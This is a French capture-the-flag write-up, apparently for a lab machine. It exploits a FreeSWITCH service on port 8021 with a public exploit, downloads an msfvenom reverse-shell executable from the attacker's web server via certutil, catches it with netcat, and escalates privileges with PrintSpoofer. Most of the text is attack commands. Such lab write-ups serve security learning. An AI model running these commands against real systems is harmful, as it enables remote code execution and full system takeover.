How low are your morals?
Commande :
nmap -sV -sC -p- -T5 10.10.135.236 -Pn
Il y a un service qui tourne sur le port 8021. Il s’agit de freeswitch.
Recherche de vulnérabilité – freeswitch :
searchsploit freeswitch
Le fichier 47799.txt contient un exploit écrit en python. Il faut le renommer en .py
Commande :
mv 47799.txt 47799.py
L’exploit fonctionne-t-il ? Le service est-il vulnérable. On a en fait pas beaucoup d’information relative au service en lui-même. Un seul moyen de savoir c’est de tester…
Commande :
python3.9 47799.py 10.10.135.236 whoami
Résultat :
L’exploit fonctionne. On a pu obtenir le nom de l’utilisateur qui fait tourner le service.
Il faut maintenant aller un peu plus loin pour obtenir un reverse shell.
Commande :
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.38.124 LPORT=4444 -f exe -o sr.exe
Mise en place d’un serveur web Kali :
python3.9 -m http.server 8787
Commande :
python3.9 47799.py 10.10.135.236 ‘certutil -urlcache -split -f http://10.11.38.124:8787/sr.exe‘
Mise en place d’un écouteur netcat :
nc -nlvp 4444
Commande :
python3.9 47799.py 10.10.135.236 ‘sr.exe’
Réception du reverse shell :
Commande :
whoami /priv
L’utilisateur a des droits SeImpersonatePrivilege
Pour augmenter ses privilege via SeImpersonatePrivilege, il est possible d’utiliser l’exploit printerspoofer.exe disponible a cette adresse.
Téléchargement :
certutil -urlcache -split -f http://10.11.38.124:8787/PrintSpoofer.exe
Commande :
PrintSpoofer.exe -i -c cmd
That’s all folks
Merci d’avoir pris la peine de venir sur le site de lire ce Write Up
J’espère qu’il vous a plus et qu’il vous apprit des nouvelles choses.
N’hésitez pas à laisse un commentaire ou à partager cet article.